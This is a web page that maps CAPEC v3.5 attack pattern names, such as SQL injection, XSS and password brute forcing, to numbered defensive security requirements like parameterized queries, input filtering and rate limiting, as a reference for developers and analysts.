Skip to main content

CAPEC™

logo

Summary

Common Attack Pattern Enumeration and Classification helps by providing a comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers and educators to advance community understanding and enhance defenses. The version used in this section is CAPEC List v3.5.

Definitions

DefinitionRequirements
1. Accessing functionality not properly constrained by ACLs096. Set user's required privileges
264. Request authentication
2. Inducing account lockout226. Avoid account lockouts
3. Using leading 'ghost' character sequences to bypass input filters173. Discard unsafe inputs
4. Using alternative IP address encodings173. Discard unsafe inputs
6. Argument injection173. Discard unsafe inputs
342. Validate request parameters
7. Blind SQL injection169. Use parameterized queries
173. Discard unsafe inputs
11. Cause web server misclassification037. Parameters without sensitive data
040. Compare file format and extension
320. Avoid client-side control enforcement
12. Choosing message identifier181. Transmit data using secure protocols
13. Subverting environment variable values046. Manage the integrity of critical files
265. Restrict access to critical processes
15. Command delimiters173. Discard unsafe inputs
16. Dictionary-based password attack332. Prevent the use of breached passwords
17. Using malicious files041. Scan files for malicious code
186. Use the principle of least privilege
18. XSS targeting non-script elements160. Encode system outputs
173. Discard unsafe inputs
19. Embedding scripts within scripts050. Control calls to interpreted code
160. Encode system outputs
173. Discard unsafe inputs
340. Use octet stream downloads
344. Avoid dynamic code execution
349. Include HTTP security headers
20. Encryption brute forcing147. Use pre-existent mechanisms
148. Set minimum size of asymmetric encryption
149. Set minimum size of symmetric encryption
150. Set minimum size for hash functions
223. Uniform distribution in random numbers
224. Use secure cryptographic mechanisms
370. Use OAEP padding with RSA
371. Use GCM Padding with AES
21. Exploitation of trusted identifiers174. Transactions without a distinguishable pattern
178. Use digital signatures
22. Exploiting trust in client173. Discard unsafe inputs
178. Use digital signatures
320. Avoid client-side control enforcement
23. File content injection041. Scan files for malicious code
046. Manage the integrity of critical files
186. Use the principle of least privilege
24. Filter failure through buffer overflow-
25. Forced deadlock337. Make critical logic flows thread safe
26. Leveraging race conditions337. Make critical logic flows thread safe
27. Leveraging race conditions via symbolic links186. Use the principle of least privilege
337. Make critical logic flows thread safe
28. Fuzzing320. Avoid client-side control enforcement
29. Leveraging time-of-check and time-of-use (TOCTOU) race conditions337. Make critical logic flows thread safe
30. Hijacking a privileged thread of execution337. Make critical logic flows thread safe
31. Accessing/Intercepting/Modifying HTTP cookies029. Cookies with security attributes
174. Transactions without a distinguishable pattern
181. Transmit data using secure protocols
342. Validate request parameters
349. Include HTTP security headers
32. XSS through HTTP query strings160. Encode system outputs
173. Discard unsafe inputs
342. Validate request parameters
349. Include HTTP security headers
33. HTTP request smuggling348. Use consistent encoding
34. HTTP response splitting173. Discard unsafe inputs
320. Avoid client-side control enforcement
35. Leverage executable code in non-executable files046. Manage the integrity of critical files
186. Use the principle of least privilege
36. Using unpublished interfaces264. Request authentication
38. Leveraging/Manipulating configuration file search paths046. Manage the integrity of critical files
39. Manipulating opaque client-based data tokens026. Encrypt client-side session information
320. Avoid client-side control enforcement
328. Request MFA for critical systems
41. Using meta-characters in e-mail headers to inject malicious payloads115. Filter malicious emails
173. Discard unsafe inputs
42. MIME conversion262. Verify third-party components
43. Exploiting multiple input interpretation layers348. Use consistent encoding
48. Passing local filenames to functions that expect a URL160. Encode system outputs
173. Discard unsafe inputs
49. Password brute forcing130. Limit password lifespan
132. Passphrases with at least 4 words
133. Passwords with at least 20 characters
237. Ascertain human interaction
327. Set a rate limit
60. Reusing session IDs (aka session replay)030. Avoid object reutilization
70. Try common usernames and passwords142. Change system default credentials
74. Manipulating state026. Encrypt client-side session information
328. Request MFA for critical systems
329. Keep client-side storage without sensitive data
94. Adversary in the middle (AiTM)092. Use externally signed certificates
181. Transmit data using secure protocols
224. Use secure cryptographic mechanisms
336. Disable insecure TLS versions
373. Use certificate pinning
113. Interface manipulation078. Disable debugging events
154. Eliminate backdoors
114. Authentication abuse232. Require equipment identity
319. Make authentication options equally secure
115. Authentication bypass154. Eliminate backdoors
222. Deny access to the host machine
228. Authenticate using standard protocols
264. Request authentication
319. Make authentication options equally secure
116. Excavation077. Avoid disclosing technical information
078. Disable debugging events
261. Avoid exposing sensitive information
325. Protect WSDL files
339. Avoid storing sensitive files in the web root
365. Avoid exposing technical information
117. Interception181. Transmit data using secure protocols
224. Use secure cryptographic mechanisms
336. Disable insecure TLS versions
338. Implement perfect forward secrecy
122. Privilege abuse095. Define users with privileges
096. Set user's required privileges
186. Use the principle of least privilege
265. Restrict access to critical processes
280. Restrict service root directory
341. Use the principle of deny by default
123. Buffer manipulation157. Use the strict mode
158. Use a secure programming language
345. Establish protections against overflows
350. Enable memory protection mechanisms
124. Shared resource manipulation337. Make critical logic flows thread safe
374. Use of isolation methods in running applications
125. Flooding062. Define standard configurations
072. Set maximum response time
327. Set a rate limit
129. Pointer manipulation157. Use the strict mode
158. Use a secure programming language
130. Excessive allocation062. Define standard configurations
072. Set maximum response time
157. Use the strict mode
160. Encode system outputs
173. Discard unsafe inputs
321. Avoid deserializing untrusted data
327. Set a rate limit
131. Resource leak exposure158. Use a secure programming language
137. Parameter injection173. Discard unsafe inputs
342. Validate request parameters
148. Content spoofing178. Use digital signatures
181. Transmit data using secure protocols
330. Verify Subresource Integrity
151. Identity spoofing062. Define standard configurations
224. Use secure cryptographic mechanisms
319. Make authentication options equally secure
153. Input data manipulation037. Parameters without sensitive data
160. Encode system outputs
173. Discard unsafe inputs
186. Use the principle of least privilege
320. Avoid client-side control enforcement
321. Avoid deserializing untrusted data
342. Validate request parameters
345. Establish protections against overflows
348. Use consistent encoding
154. Resource location spoofing046. Manage the integrity of critical files
050. Control calls to interpreted code
330. Verify Subresource Integrity
155. Screen temporary files for sensitive information036. Do not deploy temporary files
161. Infrastructure manipulation062. Define standard configurations
080. Prevent log modification
266. Disable insecure functionalities
324. Control redirects
349. Include HTTP security headers
165. File manipulation037. Parameters without sensitive data
040. Compare file format and extension
041. Scan files for malicious code
042. Validate file format
330. Verify Subresource Integrity
340. Use octet stream downloads
169. Footprinting273. Define a fixed security suite
173. Action spoofing349. Include HTTP security headers
175. Code inclusion037. Parameters without sensitive data
050. Control calls to interpreted code
173. Discard unsafe inputs
176. Configuration/Environment manipulation046. Manage the integrity of critical files
186. Use the principle of least privilege
188. Reverse engineering159. Obfuscate code
212. Functionality misuse226. Avoid account lockouts
266. Disable insecure functionalities
336. Disable insecure TLS versions
216. Communication channel manipulation181. Transmit data using secure protocols
224. Use secure cryptographic mechanisms
336. Disable insecure TLS versions
224. Fingerprinting077. Avoid disclosing technical information
325. Protect WSDL files
365. Avoid exposing technical information
227. Sustained client engagement023. Terminate inactive user sessions
025. Manage concurrent sessions
233. Privilege escalation035. Manage privilege modifications
095. Define users with privileges
186. Use the principle of least privilege
337. Make critical logic flows thread safe
341. Use the principle of deny by default
240. Resource injection160. Encode system outputs
173. Discard unsafe inputs
262. Verify third-party components
242. Code injection043. Define an explicit content type
044. Define an explicit charset
050. Control calls to interpreted code
117. Do not interpret HTML code
160. Encode system outputs
173. Discard unsafe inputs
262. Verify third-party components
344. Avoid dynamic code execution
248. Command injection160. Encode system outputs
169. Use parameterized queries
173. Discard unsafe inputs
321. Avoid deserializing untrusted data
344. Avoid dynamic code execution
272. Protocol manipulation224. Use secure cryptographic mechanisms
336. Disable insecure TLS versions
438. Modification during manufacture154. Eliminate backdoors
155. Application free of malicious code
442. Infected software273. Define a fixed security suite
475. Signature spoofing by improper validation093. Use consistent certificates
549. Local execution of code041. Scan files for malicious code
273. Define a fixed security suite
554. Functionality bypass154. Eliminate backdoors
560. Use of known domain credentials132. Passphrases with at least 4 words
133. Passwords with at least 20 characters
142. Change system default credentials
332. Prevent the use of breached passwords
586. Object injection321. Avoid deserializing untrusted data
594. Traffic injection181. Transmit data using secure protocols
224. Use secure cryptographic mechanisms
336. Disable insecure TLS versions
613. WiFi SSID tracking247. Hide SSID on private networks
248. SSID without dictionary words
254. Change SSID name
619. Signal strength tracking249. Locate access points
654. Signal strength tracking122. Validate credential ownership